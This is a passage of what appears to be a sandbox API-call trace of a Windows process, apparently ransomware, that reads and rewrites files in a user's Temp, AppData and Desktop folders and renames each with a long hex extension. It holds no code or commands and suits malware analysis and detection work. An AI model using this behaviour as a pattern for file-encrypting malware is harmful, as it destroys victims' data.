ObjectInformation=0x33400b8, ReturnLength=0x28fff70) returned 0x0 [0122.156] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Temp\\MjiKAEeZY.wav", lpString2=".06CA3B84F84D76147CBCCD48C8263F288A3615649C77DBEA0FF439449A90BB7E" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Temp\\MjiKAEeZY.wav.06CA3B84F84D76147CBCCD48C8263F288A3615649C77DBEA0FF439449A90BB7E") returned="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Temp\\MjiKAEeZY.wav.06CA3B84F84D76147CBCCD48C8263F288A3615649C77DBEA0FF439449A90BB7E" [0122.156] GetProcessHeap () returned 0x600000 [0122.156] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x12a) returned 0x32a07a0 [0122.157] NtSetInformationFile (FileHandle=0x308, IoStatusBlock=0x28fff60, FileInformation=0x32a07a0, Length=0x12a, FileInformationClass=0xa) returned 0x0 [0122.158] CloseHandle (hObject=0x308) returned 1 [0122.158] GetProcessHeap () returned 0x600000 [0122.158] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3340008 | out: hHeap=0x600000) returned 1 [0122.158] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x28fff7c, lpCompletionKey=0x28fff78, lpOverlapped=0x28fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x28fff7c, lpCompletionKey=0x28fff78, lpOverlapped=0x28fff74) returned 1 [0122.162] ReadFile (in: hFile=0x308, lpBuffer=0x3360140, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x0, lpOverlapped=0x3340008 | out: lpBuffer=0x3360140*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3340008) returned 1 [0122.162] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x28fff7c, lpCompletionKey=0x28fff78, lpOverlapped=0x28fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x28fff7c, lpCompletionKey=0x28fff78, lpOverlapped=0x28fff74) returned 1 [0122.163] NtQueryObject (in: Handle=0x308, ObjectInformationClass=0x1, ObjectInformation=0x33400b8, ObjectInformationLength=0x10004, ReturnLength=0x28fff70 | out: ObjectInformation=0x33400b8, ReturnLength=0x28fff70) returned 0x0 [0122.164] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Temp\\MyrMx1J.png", lpString2=".F40EE91B564B0EF23F35558D5B8E2B5346800F7598D55A9B7A07E7747A13DE7A" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Temp\\MyrMx1J.png.F40EE91B564B0EF23F35558D5B8E2B5346800F7598D55A9B7A07E7747A13DE7A") returned="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Temp\\MyrMx1J.png.F40EE91B564B0EF23F35558D5B8E2B5346800F7598D55A9B7A07E7747A13DE7A" [0122.164] GetProcessHeap () returned 0x600000 [0122.164] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x126) returned 0x32a08d8 [0122.164] NtSetInformationFile (FileHandle=0x308, IoStatusBlock=0x28fff60, FileInformation=0x32a08d8, Length=0x126, FileInformationClass=0xa) returned 0x0 [0122.165] CloseHandle (hObject=0x308) returned 1 [0122.166] GetProcessHeap () returned 0x600000 [0122.166] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3340008 | out: hHeap=0x600000) returned 1 [0122.167] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x28fff7c, lpCompletionKey=0x28fff78, lpOverlapped=0x28fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x28fff7c, lpCompletionKey=0x28fff78, lpOverlapped=0x28fff74) returned 1 [0122.172] ReadFile (in: hFile=0x308, lpBuffer=0x3360140, nNumberOfBytesToRead=0x3000, lpNumberOfBytesRead=0x0, lpOverlapped=0x3340008 | out: lpBuffer=0x3360140*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3340008) returned 1 [0122.173] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x28fff7c, lpCompletionKey=0x28fff78, lpOverlapped=0x28fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x28fff7c, lpCompletionKey=0x28fff78, lpOverlapped=0x28fff74) returned 1 [0122.174] NtQueryObject (in: Handle=0x308, ObjectInformationClass=0x1, ObjectInformation=0x33400b8, ObjectInformationLength=0x10004, ReturnLength=0x28fff70 | out: ObjectInformation=0x33400b8, ReturnLength=0x28fff70) returned 0x0 [0122.174] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Temp\\N eZZURmexiQEMP0.m4a", lpString2=".7ED47C1010A27201C25BCCD7B2BD5C4258B867EB681DE582469D529D5F71E858" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Temp\\N eZZURmexiQEMP0.m4a.7ED47C1010A27201C25BCCD7B2BD5C4258B867EB681DE582469D529D5F71E858") returned="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Temp\\N eZZURmexiQEMP0.m4a.7ED47C1010A27201C25BCCD7B2BD5C4258B867EB681DE582469D529D5F71E858" [0122.174] GetProcessHeap () returned 0x600000 [0122.174] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x138) returned 0x318de30 [0122.174] NtSetInformationFile (FileHandle=0x308, IoStatusBlock=0x28fff60, FileInformation=0x318de30, Length=0x138, FileInformationClass=0xa) returned 0x0 [0122.176] CloseHandle (hObject=0x308) returned 1 [0122.176] GetProcessHeap () returned 0x600000 [0122.176] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3340008 | out: hHeap=0x600000) returned 1 [0122.176] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x28fff7c, lpCompletionKey=0x28fff78, lpOverlapped=0x28fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x28fff7c, lpCompletionKey=0x28fff78, lpOverlapped=0x28fff74) returned 1 [0122.186] ReadFile (in: hFile=0x308, lpBuffer=0x3360140, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x0, lpOverlapped=0x3340008 | out: lpBuffer=0x3360140*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3340008) returned 1 [0122.186] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x28fff7c, lpCompletionKey=0x28fff78, lpOverlapped=0x28fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x28fff7c, lpCompletionKey=0x28fff78, lpOverlapped=0x28fff74) returned 1 [0122.187] NtQueryObject (in: Handle=0x308, ObjectInformationClass=0x1, ObjectInformation=0x33400b8, ObjectInformationLength=0x10004, ReturnLength=0x28fff70 | out: ObjectInformation=0x33400b8, ReturnLength=0x28fff70) returned 0x0 [0122.188] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Temp\\q51Sk6kjBCjcsj73ADD.m4a", lpString2=".23DB3EE3D5060111C7E2EF582D0BC431DBC9966D6D9649DDB6B812113871831D" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Temp\\q51Sk6kjBCjcsj73ADD.m4a.23DB3EE3D5060111C7E2EF582D0BC431DBC9966D6D9649DDB6B812113871831D") returned="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Temp\\q51Sk6kjBCjcsj73ADD.m4a.23DB3EE3D5060111C7E2EF582D0BC431DBC9966D6D9649DDB6B812113871831D" [0122.188] GetProcessHeap () returned 0x600000 [0122.188] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x13e) returned 0x32a0a08 [0122.188] NtSetInformationFile (FileHandle=0x308, IoStatusBlock=0x28fff60, FileInformation=0x32a0a08, Length=0x13e, FileInformationClass=0xa) returned 0x0 [0122.190] CloseHandle (hObject=0x308) returned 1 [0122.190] GetProcessHeap () returned 0x600000 [0122.190] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3340008 | out: hHeap=0x600000) returned 1 [0122.190] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x28fff7c, lpCompletionKey=0x28fff78, lpOverlapped=0x28fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x28fff7c, lpCompletionKey=0x28fff78, lpOverlapped=0x28fff74) returned 1 [0122.198] ReadFile (in: hFile=0x308, lpBuffer=0x3360140, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x0, lpOverlapped=0x3340008 | out: lpBuffer=0x3360140*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3340008) returned 1 [0122.198] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x28fff7c, lpCompletionKey=0x28fff78, lpOverlapped=0x28fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x28fff7c, lpCompletionKey=0x28fff78, lpOverlapped=0x28fff74) returned 1 [0122.200] NtQueryObject (in: Handle=0x308, ObjectInformationClass=0x1, ObjectInformation=0x33400b8, ObjectInformationLength=0x10004, ReturnLength=0x28fff70 | out: ObjectInformation=0x33400b8, ReturnLength=0x28fff70) returned 0x0 [0122.200] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Temp\\wemF6vuzEv.ods", lpString2=".13E7CE8BFD379CCF8F25F49CB481E4D050B7107E05E7550A4DEC6CB1A6EA7110" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Temp\\wemF6vuzEv.ods.13E7CE8BFD379CCF8F25F49CB481E4D050B7107E05E7550A4DEC6CB1A6EA7110") returned="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Temp\\wemF6vuzEv.ods.13E7CE8BFD379CCF8F25F49CB481E4D050B7107E05E7550A4DEC6CB1A6EA7110" [0122.200] GetProcessHeap () returned 0x600000 [0122.200] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x12c) returned 0x32a0b50 [0122.200] NtSetInformationFile (FileHandle=0x308, IoStatusBlock=0x28fff60, FileInformation=0x32a0b50, Length=0x12c, FileInformationClass=0xa) returned 0x0 [0122.202] CloseHandle (hObject=0x308) returned 1 [0122.202] GetProcessHeap () returned 0x600000 [0122.202] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3340008 | out: hHeap=0x600000) returned 1 [0122.202] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x28fff7c, lpCompletionKey=0x28fff78, lpOverlapped=0x28fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x28fff7c, lpCompletionKey=0x28fff78, lpOverlapped=0x28fff74) returned 1 [0122.206] ReadFile (in: hFile=0x308, lpBuffer=0x3360140, nNumberOfBytesToRead=0xa00, lpNumberOfBytesRead=0x0, lpOverlapped=0x3340008 | out: lpBuffer=0x3360140*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3340008) returned 1 [0122.206] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x28fff7c, lpCompletionKey=0x28fff78, lpOverlapped=0x28fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x28fff7c, lpCompletionKey=0x28fff78, lpOverlapped=0x28fff74) returned 1 [0122.207] NtQueryObject (in: Handle=0x308, ObjectInformationClass=0x1, ObjectInformation=0x33400b8, ObjectInformationLength=0x10004, ReturnLength=0x28fff70 | out: ObjectInformation=0x33400b8, ReturnLength=0x28fff70) returned 0x0 [0122.208] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Temp\\wWUKpJTZ1mfccuF.jpg", lpString2=".BB9039DF14595010849D312795F4C7B7BD6103CED93FC7FF2333D91F05FBC856" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Temp\\wWUKpJTZ1mfccuF.jpg.BB9039DF14595010849D312795F4C7B7BD6103CED93FC7FF2333D91F05FBC856") returned="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Temp\\wWUKpJTZ1mfccuF.jpg.BB9039DF14595010849D312795F4C7B7BD6103CED93FC7FF2333D91F05FBC856" [0122.208] GetProcessHeap () returned 0x600000 [0122.208] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x136) returned 0x318df78 [0122.208] NtSetInformationFile (FileHandle=0x308, IoStatusBlock=0x28fff60, FileInformation=0x318df78, Length=0x136, FileInformationClass=0xa) returned 0x0 [0122.211] CloseHandle (hObject=0x308) returned 1 [0122.212] GetProcessHeap () returned 0x600000 [0122.212] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3340008 | out: hHeap=0x600000) returned 1 [0122.212] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x28fff7c, lpCompletionKey=0x28fff78, lpOverlapped=0x28fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x28fff7c, lpCompletionKey=0x28fff78, lpOverlapped=0x28fff74) returned 1 [0122.216] ReadFile (in: hFile=0x308, lpBuffer=0x3360140, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x0, lpOverlapped=0x3340008 | out: lpBuffer=0x3360140*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3340008) returned 1 [0122.216] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x28fff7c, lpCompletionKey=0x28fff78, lpOverlapped=0x28fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x28fff7c, lpCompletionKey=0x28fff78, lpOverlapped=0x28fff74) returned 1 [0122.217] NtQueryObject (in: Handle=0x308, ObjectInformationClass=0x1, ObjectInformation=0x33400b8, ObjectInformationLength=0x10004, ReturnLength=0x28fff70 | out: ObjectInformation=0x33400b8, ReturnLength=0x28fff70) returned 0x0 [0122.218] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Temp\\XwfQhMTHg8q.m4a", lpString2=".41F9B3A481E9F5678C8B7FB607E84DE4E6F29B7D45660F0B999F3025B7DDA81B" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Temp\\XwfQhMTHg8q.m4a.41F9B3A481E9F5678C8B7FB607E84DE4E6F29B7D45660F0B999F3025B7DDA81B") returned="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Temp\\XwfQhMTHg8q.m4a.41F9B3A481E9F5678C8B7FB607E84DE4E6F29B7D45660F0B999F3025B7DDA81B" [0122.218] GetProcessHeap () returned 0x600000 [0122.218] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x12e) returned 0x32a0c88 [0122.218] NtSetInformationFile (FileHandle=0x308, IoStatusBlock=0x28fff60, FileInformation=0x32a0c88, Length=0x12e, FileInformationClass=0xa) returned 0x0 [0122.219] CloseHandle (hObject=0x308) returned 1 [0122.220] GetProcessHeap () returned 0x600000 [0122.220] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3340008 | out: hHeap=0x600000) returned 1 [0122.220] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x28fff7c, lpCompletionKey=0x28fff78, lpOverlapped=0x28fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x28fff7c, lpCompletionKey=0x28fff78, lpOverlapped=0x28fff74) returned 1 [0122.223] ReadFile (in: hFile=0x308, lpBuffer=0x3360140, nNumberOfBytesToRead=0x1c00, lpNumberOfBytesRead=0x0, lpOverlapped=0x3340008 | out: lpBuffer=0x3360140*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3340008) returned 1 [0122.224] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x28fff7c, lpCompletionKey=0x28fff78, lpOverlapped=0x28fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x28fff7c, lpCompletionKey=0x28fff78, lpOverlapped=0x28fff74) returned 1 [0122.225] NtQueryObject (in: Handle=0x308, ObjectInformationClass=0x1, ObjectInformation=0x33400b8, ObjectInformationLength=0x10004, ReturnLength=0x28fff70 | out: ObjectInformation=0x33400b8, ReturnLength=0x28fff70) returned 0x0 [0122.225] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Temp\\za8fs-W9_GC6qVPSM.jpg", lpString2=".D82D744E0045C4123BE7F8867F181514CCCFD05A940A7B074259A6A21ABD8D44" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Temp\\za8fs-W9_GC6qVPSM.jpg.D82D744E0045C4123BE7F8867F181514CCCFD05A940A7B074259A6A21ABD8D44") returned="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Temp\\za8fs-W9_GC6qVPSM.jpg.D82D744E0045C4123BE7F8867F181514CCCFD05A940A7B074259A6A21ABD8D44" [0122.225] GetProcessHeap () returned 0x600000 [0122.225] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x13a) returned 0x32a0dc0 [0122.225] NtSetInformationFile (FileHandle=0x308, IoStatusBlock=0x28fff60, FileInformation=0x32a0dc0, Length=0x13a, FileInformationClass=0xa) returned 0x0 [0122.237] CloseHandle (hObject=0x308) returned 1 [0122.238] GetProcessHeap () returned 0x600000 [0122.238] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3340008 | out: hHeap=0x600000) returned 1 [0122.238] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x28fff7c, lpCompletionKey=0x28fff78, lpOverlapped=0x28fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x28fff7c, lpCompletionKey=0x28fff78, lpOverlapped=0x28fff74) returned 1 [0122.256] ReadFile (in: hFile=0x308, lpBuffer=0x3360140, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x0, lpOverlapped=0x3340008 | out: lpBuffer=0x3360140*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3340008) returned 1 [0122.256] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x28fff7c, lpCompletionKey=0x28fff78, lpOverlapped=0x28fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x28fff7c, lpCompletionKey=0x28fff78, lpOverlapped=0x28fff74) returned 1 [0122.257] WriteFile (in: hFile=0x308, lpBuffer=0x3360140*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3340008 | out: lpBuffer=0x3360140*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3340008) returned 1 [0122.258] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x28fff7c, lpCompletionKey=0x28fff78, lpOverlapped=0x28fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x28fff7c, lpCompletionKey=0x28fff78, lpOverlapped=0x28fff74) returned 1 [0122.283] NtQueryObject (in: Handle=0x318, ObjectInformationClass=0x1, ObjectInformation=0x33400b8, ObjectInformationLength=0x10004, ReturnLength=0x28fff70 | out: ObjectInformation=0x33400b8, ReturnLength=0x28fff70) returned 0x0 [0122.283] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\TileDataLayer\\Database\\EDB00005.log", lpString2=".5D9A28B0288E12CDA36B0162300913E84B779E8CAF03ECD858B6645FCDCD901A" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\TileDataLayer\\Database\\EDB00005.log.5D9A28B0288E12CDA36B0162300913E84B779E8CAF03ECD858B6645FCDCD901A") returned="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\TileDataLayer\\Database\\EDB00005.log.5D9A28B0288E12CDA36B0162300913E84B779E8CAF03ECD858B6645FCDCD901A" [0122.283] GetProcessHeap () returned 0x600000 [0122.283] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x14c) returned 0x6da428 [0122.283] NtSetInformationFile (FileHandle=0x318, IoStatusBlock=0x28fff60, FileInformation=0x6da428, Length=0x14c, FileInformationClass=0xa) returned 0x0 [0122.285] CloseHandle (hObject=0x318) returned 1 [0122.286] GetProcessHeap () returned 0x600000 [0122.286] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3340008 | out: hHeap=0x600000) returned 1 [0122.286] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x28fff7c, lpCompletionKey=0x28fff78, lpOverlapped=0x28fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x28fff7c, lpCompletionKey=0x28fff78, lpOverlapped=0x28fff74) returned 1 [0122.292] ReadFile (in: hFile=0x318, lpBuffer=0x3360140, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x0, lpOverlapped=0x3340008 | out: lpBuffer=0x3360140*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3340008) returned 1 [0122.293] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x28fff7c, lpCompletionKey=0x28fff78, lpOverlapped=0x28fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x28fff7c, lpCompletionKey=0x28fff78, lpOverlapped=0x28fff74) returned 1 [0122.294] WriteFile (in: hFile=0x318, lpBuffer=0x3360140, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3340008 | out: lpBuffer=0x3360140, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3340008) returned 0x0 [0122.294] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x28fff7c, lpCompletionKey=0x28fff78, lpOverlapped=0x28fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x28fff7c, lpCompletionKey=0x28fff78, lpOverlapped=0x28fff74) returned 1 [0122.304] NtQueryObject (in: Handle=0x318, ObjectInformationClass=0x1, ObjectInformation=0x33400b8, ObjectInformationLength=0x10004, ReturnLength=0x28fff70 | out: ObjectInformation=0x33400b8, ReturnLength=0x28fff70) returned 0x0 [0122.304] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\TileDataLayer\\Database\\EDBtmp.log", lpString2=".3E0EC442ED7B35A791518753BDB3D7B60CCE4B13CA19ADAAADB3455DB398A254" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\TileDataLayer\\Database\\EDBtmp.log.3E0EC442ED7B35A791518753BDB3D7B60CCE4B13CA19ADAAADB3455DB398A254") returned="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\TileDataLayer\\Database\\EDBtmp.log.3E0EC442ED7B35A791518753BDB3D7B60CCE4B13CA19ADAAADB3455DB398A254" [0122.304] GetProcessHeap () returned 0x600000 [0122.305] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x148) returned 0x6da580 [0122.305] NtSetInformationFile (FileHandle=0x318, IoStatusBlock=0x28fff60, FileInformation=0x6da580, Length=0x148, FileInformationClass=0xa) returned 0x0 [0122.308] CloseHandle (hObject=0x318) returned 1 [0122.308] GetProcessHeap () returned 0x600000 [0122.308] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3340008 | out: hHeap=0x600000) returned 1 [0122.310] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x28fff7c, lpCompletionKey=0x28fff78, lpOverlapped=0x28fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x28fff7c, lpCompletionKey=0x28fff78, lpOverlapped=0x28fff74) returned 1 [0122.569] ReadFile (in: hFile=0x318, lpBuffer=0x3360140, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x0, lpOverlapped=0x3340008 | out: lpBuffer=0x3360140*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3340008) returned 1 [0122.569] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x28fff7c, lpCompletionKey=0x28fff78, lpOverlapped=0x28fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x28fff7c, lpCompletionKey=0x28fff78, lpOverlapped=0x28fff74) returned 1 [0122.573] WriteFile (in: hFile=0x30c, lpBuffer=0x690478*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x670340 | out: lpBuffer=0x690478*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x670340) returned 1 [0122.599] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x28fff7c, lpCompletionKey=0x28fff78, lpOverlapped=0x28fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x28fff7c, lpCompletionKey=0x28fff78, lpOverlapped=0x28fff74) returned 1 [0122.603] NtQueryObject (in: Handle=0x324, ObjectInformationClass=0x1, ObjectInformation=0x32a0fb8, ObjectInformationLength=0x10004, ReturnLength=0x28fff70 | out: ObjectInformation=0x32a0fb8, ReturnLength=0x28fff70) returned 0x0 [0122.603] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\64GfBcTvo.bmp", lpString2=".A70108E0487A5B090AFB0AFAB60F855ACB2B987124AA80C24CF9858C1D30B066" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\64GfBcTvo.bmp.A70108E0487A5B090AFB0AFAB60F855ACB2B987124AA80C24CF9858C1D30B066") returned="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\64GfBcTvo.bmp.A70108E0487A5B090AFB0AFAB60F855ACB2B987124AA80C24CF9858C1D30B066" [0122.604] GetProcessHeap () returned 0x600000 [0122.604] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x124) returned 0x6da6d0 [0122.604] NtSetInformationFile (FileHandle=0x324, IoStatusBlock=0x28fff60, FileInformation=0x6da6d0, Length=0x124, FileInformationClass=0xa) returned 0x0 [0122.611] CloseHandle (hObject=0x324) returned 1 [0122.612] GetProcessHeap () returned 0x600000 [0122.612] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x32a0f08 | out: hHeap=0x600000) returned 1 [0122.613] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x28fff7c, lpCompletionKey=0x28fff78, lpOverlapped=0x28fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x28fff7c, lpCompletionKey=0x28fff78, lpOverlapped=0x28fff74) returned 1 [0123.565] WriteFile (in: hFile=0x304, lpBuffer=0x3360140, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3340008 | out: lpBuffer=0x3360140, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3340008) returned 0x0 [0123.570] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x28fff7c, lpCompletionKey=0x28fff78, lpOverlapped=0x28fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x28fff7c, lpCompletionKey=0x28fff78, lpOverlapped=0x28fff74) returned 1 [0123.579] NtQueryObject (in: Handle=0x308, ObjectInformationClass=0x1, ObjectInformation=0x6703f0, ObjectInformationLength=0x10004, ReturnLength=0x28fff70 | out: ObjectInformation=0x6703f0, ReturnLength=0x28fff70) returned 0x0 [0123.580] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\Desktop\\0nCLUahlnH8X3ua_zd0V.png", lpString2=".1B04248B4CFDC55D05C33BB41B53B51B252CAB234648F09F9B090BFDE112F65D" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\Desktop\\0nCLUahlnH8X3ua_zd0V.png.1B04248B4CFDC55D05C33BB41B53B51B252CAB234648F09F9B090BFDE112F65D") returned="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\Desktop\\0nCLUahlnH8X3ua_zd0V.png.1B04248B4CFDC55D05C33BB41B53B51B252CAB234648F09F9B090BFDE112F65D" [0123.580] GetProcessHeap () returned 0x600000 [0123.580] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x12a) returned 0x6f5de0 [0123.580] NtSetInformationFile (FileHandle=0x308, IoStatusBlock=0x28fff60, FileInformation=0x6f5de0, Length=0x12a, FileInformationClass=0xa) returned 0x0 [0123.582] CloseHandle (hObject=0x308) returned 1 [0123.583] GetProcessHeap () returned 0x600000 